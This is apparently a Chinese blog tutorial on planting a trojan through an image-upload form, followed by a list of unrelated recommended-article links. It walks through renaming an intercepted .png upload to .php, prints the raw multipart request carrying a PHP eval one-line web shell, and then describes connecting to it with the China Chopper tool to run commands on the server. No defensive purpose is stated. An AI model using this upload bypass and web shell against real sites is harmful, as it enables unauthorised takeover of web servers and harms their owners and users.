图片上传网站木马教程

思路:

  图片上传功能中,前端页面上传的是.png格式的图片文件,但是抓包Request中修改图片后缀为.php

可以绕过对上传文件格式的限制,文件的上传路径可以在上传后的页面或查看上传成功后的response中有显示,

记录下来后用菜刀连接即可。

(1)网站要求上传png格式的文件

(2)保存-抓包,将文件后缀.png删除,剩余.php文件继续提交,提示成功。

Content-Disposition: form-data; name="fun_menu_icon"test123trojan.php-----------------------------1962884403821Content-Disposition: form-data; name="fun_menu_icon_upload"; filename="test123trojan.php"Content-Type: image/png<?php @eval($_POST['caidao']); ?>
-----------------------------1962884403821Content-Disposition: form-data; name="fun_menu_img"test123trojan.php-----------------------------1962884403821Content-Disposition: form-data; name="fun_menu_img_upload"; filename="test123trojan.php"Content-Type: image/png<?php @eval($_POST['caidao']); ?>

(3)在原始数据提交页面或提交数据后response页面中查找上传路径并记录

(4)打开最新版中国菜刀,添加已经记录的路径,添加密码caidao

(5)连接虚拟终端,输入ipconfig

木马成功上传并执行。

喜欢我的关注,更多资源分享

如何绕过图片格式限制上传木马获取WebShell相关推荐

  1. Java实现图片文件的上传和获取

    在做一个网站开发时,难免会遇到图片等文件的上传和获取,举一个简单的例子,就是用户的头像问题,我们应该怎么上传,怎么获取,上传到哪呢,等一系列的问题,其实像图片这些文件,存储在云存储空间比较合适,但是收 ...

  2. 图片绑定file上传并获取图片的base64

    <!-- 影像上传 start --> <div class="yx-upload-box" style="display:none;"> ...

  3. Mvc检查图片格式后上传

    /// <summary>/// 检查是否文件是否图片并保存/// </summary>/// <param name="file">文件< ...

  4. 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

    封神台 https://hack.zkaq.cn 一.1.通过修改Cookie登录后台(没用重打)         2,上传SHELL!3,Flag在网站根目录(flag.php)         3 ...

  5. 文件上传漏洞、WebShell、防御及绕过利用、Web容器解析漏洞、编辑器上传漏洞

    文章目录 文件上传漏洞 漏洞概述 漏洞成因 漏洞危害 WebShell 大马 小马 GetShell 漏洞利用的条件 PUT方法上传文件 漏洞的防御.绕过和利用 黑白名单策略 安装upload-lab ...

  6. 00截断上传绕过_【文件上传与解析】文件上传与解析漏洞总结v1.0

    点击上方"公众号" 可以订阅哦! Hello,各位小伙伴晚上好~ 这里是依旧勤劳写公众号的小编~ 今天本公众号将推出一个新的模块,那就是漏洞知识点总结模块!!!(此处应有掌声~) ...

  7. php文件上传绕过mime类型,文件上传限制绕过技巧

    严正声明:本文仅限于技术讨论,严禁用于其他用途. 简介 文件上传漏洞是web安全中经常利用到的一种漏洞形式.一些web应用程序中允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以 ...

  8. 网站被上传木马应该如何处理

    网站被上传木马应该如何处理有时会收到一些客户反映网站被黑,或被上传木马,当用户访问网站时就会下载病毒或者木马,杀毒软件弹出病毒的提示.这种情况是以下2种情况导致的: 第一种情况:客户网站存在文件上传漏 ...

  9. php网站上传木马,php一句话木马怎么上传

    一句话木马上传常见的几种方法: 1.利用00截断,brupsuite上传 利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞. 假设文件的上传路径为http:// ...

最新文章

  1. 计算机基础操作与应用实训教程,计算机应用基础实训教程の第 3 章 Word 2003 基本操作.pdf...
  2. Zookeeper集群搭建分布式
  3. 华为鸿蒙搭载芯片,独立188天,荣耀50系列破冰!6nm芯片,不搭载鸿蒙
  4. Postman接口调试神器
  5. 想要设计自己的微服务?看这篇文章就对了 1
  6. django-单表的增删改查-用户部门表
  7. 《RabbitMQ 实战指南》第二章 RabbitMQ 入门
  8. 搭建网站常见返回码40X 50X等错误的原因及解决方案
  9. 查什么攻略?百行 Python 代码告诉你国庆哪些景点爆满!
  10. Eclipse用法和技巧十九:eclipse修改workspace
  11. iocomp入门教程-以MFC中iplotx为例
  12. Matpower软件简介和参数介绍
  13. C在mac上用不了malloc.h头文件的解决方法
  14. GD32 startup.s
  15. 刘润《五分钟商学院》思维导图笔记 - 管理篇
  16. Hadoop——3.x安装部署
  17. 基础二:晶体与各向异性
  18. 如何将Ubuntu中的chrome浏览器升级到最新版
  19. 清华师哥封神之作!RocketMQ核心笔记疯传Ali内网
  20. 计算机二级考试干货内容,干货分享,如何备考计算机二级?

热门文章

  1. 矮人DOS工具箱 4.2:把DOS/Ghost/分区专家集成至启动菜单
  2. [深度][PyTorch] DDP系列第三篇:实战与技巧
  3. pytorch apex +ddp 分布式训练+数据优化
  4. spyder和Python有什么联系?spyder有哪些功能?
  5. 【Python爬虫】MongoDB爬虫实践:爬取虎扑论坛
  6. DMA双螺旋结构是大自然长期进化的结果
  7. 计算机毕业设计(51)java小程序毕设作品之教室图书馆座位预约小程序系统
  8. linux 命令行高亮显示
  9. IC从业人员基础:计算机基础知识缩写
  10. 求绝对值指针c语言,C语言实现abs和fabs绝对值